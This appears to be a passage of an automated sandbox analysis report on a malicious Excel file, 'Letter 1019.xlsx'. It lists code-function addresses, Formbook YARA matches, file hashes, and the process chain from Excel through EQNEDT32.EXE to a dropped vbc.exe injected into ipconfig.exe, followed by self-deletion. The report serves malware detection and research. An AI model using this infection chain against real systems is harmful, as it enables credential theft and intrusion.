          Source: C:\Users\Public\vbc.exeCode function: 5_2_007757C35_2_007757C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C7BC5_2_0074C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C579A5_2_007C579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076286D5_2_0076286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C85C5_2_0074C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DF8EE5_2_007DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C59555_2_007C5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007569FE5_2_007569FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007429B25_2_007429B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E098E5_2_007E098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007F3A835_2_007F3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00767B005_2_00767B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073FBD75_2_0073FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007CDBDA5_2_007CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007ECBA45_2_007ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074CD5B5_2_0074CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00770D3B5_2_00770D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DFDDD5_2_007DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075EE4C5_2_0075EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00772E2F5_2_00772E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076DF7C5_2_0076DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750F3F5_2_00750F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023612387_2_02361238
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BE2E97_2_022BE2E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C23057_2_022C2305
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0230A37B7_2_0230A37B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C73537_2_022C7353
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BF3CF7_2_022BF3CF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022E63DB7_2_022E63DB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022ED0057_2_022ED005
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C30407_2_022C3040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022D905A7_2_022D905A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BE0C67_2_022BE0C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023626227_2_02362622
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C46807_2_022C4680
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022CE6C17_2_022CE6C1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022CC7BC7_2_022CC7BC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0234579A7_2_0234579A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022F57C37_2_022F57C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022D14897_2_022D1489
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022F54857_2_022F5485
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C351F7_2_022C351F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022DC5F07_2_022DC5F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02373A837_2_02373A83
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022E7B007_2_022E7B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0236CBA47_2_0236CBA4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0234DBDA7_2_0234DBDA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BFBD77_2_022BFBD7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022E286D7_2_022E286D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022CC85C7_2_022CC85C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0235F8EE7_2_0235F8EE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_023459557_2_02345955
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C29B27_2_022C29B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0236098E7_2_0236098E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022D69FE7_2_022D69FE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022F2E2F7_2_022F2E2F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022DEE4C7_2_022DEE4C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022D0F3F7_2_022D0F3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022EDF7C7_2_022EDF7C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022F0D3B7_2_022F0D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022CCD5B7_2_022CCD5B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0235FDDD7_2_0235FDDD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B4937_2_0009B493
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B4967_2_0009B496
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C5397_2_0009C539
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C7957_2_0009C795
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B8B17_2_0009B8B1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B9547_2_0009B954
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C4B7_2_00088C4B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00088C507_2_00088C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D897_2_00082D89
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082D907_2_00082D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009CE857_2_0009CE85
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009BF127_2_0009BF12
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00082FB07_2_00082FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E67C77_2_008E67C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E08F97_2_008E08F9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E50627_2_008E5062
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E09027_2_008E0902
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E32FF7_2_008E32FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E33027_2_008E3302
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E13627_2_008E1362
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E75B27_2_008E75B2
          Source: Letter 1019.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe 771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0232F970 appears 81 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 022BE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0230373B appears 238 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 022BDF5C appears 107 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02303F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AF970 appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00783F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0078373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073DF5C appears 107 times
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: doc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/17@5/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Letter 1019.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFDAF.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Letter 1019.xlsxReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Letter 1019.xlsxStatic file information: File size 1297920 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: vbc.exe
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2207164700.000000000026C000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: Letter 1019.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Letter 1019.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: doc[1].exe.2.dr, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.vbc.exe.1000000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.vbc.exe.1000000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.vbc.exe.1000000.4.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.1000000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.vbc.exe.1000000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EB153 push eax; ret 4_2_001EB160
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B5758 push cs; ret 4_2_009B575C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B5762 push cs; ret 4_2_009B5766
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B2A2 push cs; ret 5_2_0041B2A3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3FB push eax; ret 5_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B45C push eax; ret 5_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415414 push esp; ret 5_2_00415416
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00414F46 push cs; ret 5_2_00414F47
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF12 push dword ptr [8427D5C5h]; ret 5_2_0041C1FF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415FC5 push ebp; ret 5_2_00415FC6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073DFA1 push ecx; ret 5_2_0073DFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022BDFA1 push ecx; ret 7_2_022BDFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B2A2 push cs; ret 7_2_0009B2A3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3A5 push eax; ret 7_2_0009B3F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3FB push eax; ret 7_2_0009B462
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3F2 push eax; ret 7_2_0009B3F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00095414 push esp; ret 7_2_00095416
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B45C push eax; ret 7_2_0009B462
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009BF12 push dword ptr [8427D5C5h]; ret 7_2_0009C1FF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00094F46 push cs; ret 7_2_00094F47
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00095FC5 push ebp; ret 7_2_00095FC6
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86649805273

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
